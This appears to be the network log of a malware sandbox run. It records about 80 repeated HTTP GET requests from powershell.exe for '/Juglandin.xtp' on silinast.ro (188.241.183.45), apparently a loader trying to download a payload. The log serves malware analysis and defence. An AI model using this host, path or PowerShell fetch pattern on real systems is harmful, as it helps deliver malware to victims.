              Oct 8, 2024 11:03:01.696805000 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.662257188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:05.735538006 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.662258188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:05.746838093 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.662286188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:09.766518116 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.662287188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:09.777503967 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.662288188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:13.819681883 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.662289188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:13.831142902 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.662290188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:17.846098900 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.662291188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:17.861368895 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.662292188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:21.875823975 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.662293188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:21.887191057 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.662297188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:25.922327042 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.662298188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:25.935725927 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.662317188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:30.031838894 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.662318188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:30.042226076 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.662325188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:34.672911882 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.662326188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:34.686928988 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.662327188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:38.706401110 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.662328188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:38.718795061 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.662329188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:42.751023054 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.662330188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:42.767398119 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.662352188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:46.808346987 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.662353188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:46.820125103 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.662367188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:50.851618052 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.662368188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:50.872802973 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.662369188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:54.891944885 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.662370188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:54.903109074 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.662371188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:58.991024017 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.662372188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:59.011378050 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.662373188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:03.051415920 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.662374188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:03.062908888 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.662375188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:07.163765907 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.662376188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:07.175585985 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.662377188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:11.206233025 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.662378188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:11.217703104 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.662379188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:15.237845898 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.662380188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:15.250338078 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.662381188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:19.285397053 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.662382188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:19.297791004 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.662383188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:23.439932108 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.662384188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:23.452800989 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.662387188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:27.487709999 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.662388188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:27.499104977 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.662389188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:31.521341085 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.662390188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:31.535413027 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              80 | 192.168.2.6 | 62391 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:35.550025940 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              81 | 192.168.2.6 | 62392 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:35.568541050 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              82 | 192.168.2.6 | 62393 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:39.754349947 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              83 | 192.168.2.6 | 62394 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:39.767498970 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              84 | 192.168.2.6 | 62395 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:43.799720049 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              85 | 192.168.2.6 | 62396 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:43.903882980 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              86 | 192.168.2.6 | 62397 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:48.454600096 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              87 | 192.168.2.6 | 62398 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:48.467355013 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              88 | 192.168.2.6 | 62399 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:52.803606033 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              89 | 192.168.2.6 | 62400 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:52.817888021 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              90 | 192.168.2.6 | 62401 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:56.862248898 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              91 | 192.168.2.6 | 62402 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:04:56.875790119 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              92 | 192.168.2.6 | 62403 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:00.940125942 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              93 | 192.168.2.6 | 62404 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:00.955046892 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              94 | 192.168.2.6 | 62405 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:04.988873005 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              95 | 192.168.2.6 | 62406 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:05.000705004 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              96 | 192.168.2.6 | 62407 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:09.035557032 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              97 | 192.168.2.6 | 62408 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:09.052022934 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              98 | 192.168.2.6 | 62409 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:13.086461067 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              99 | 192.168.2.6 | 62410 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:13.104037046 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              100 | 192.168.2.6 | 62411 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:17.237698078 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              101 | 192.168.2.6 | 62412 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:17.249528885 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              102 | 192.168.2.6 | 62413 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:21.284116983 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              103 | 192.168.2.6 | 62414 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:21.295300007 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              104 | 192.168.2.6 | 62415 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:25.347069979 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              105 | 192.168.2.6 | 62416 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:25.359805107 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              106 | 192.168.2.6 | 62417 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:29.378079891 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              107 | 192.168.2.6 | 62418 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:29.389225006 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              108 | 192.168.2.6 | 62419 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:33.438395023 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              109 | 192.168.2.6 | 62420 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:33.450130939 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              110 | 192.168.2.6 | 62421 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:37.503359079 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              111 | 192.168.2.6 | 62422 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:37.515322924 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              112 | 192.168.2.6 | 62425 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:41.534184933 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              113 | 192.168.2.6 | 62426 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:41.545600891 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              114 | 192.168.2.6 | 62427 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:45.747153044 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              115 | 192.168.2.6 | 62428 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:45.763678074 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
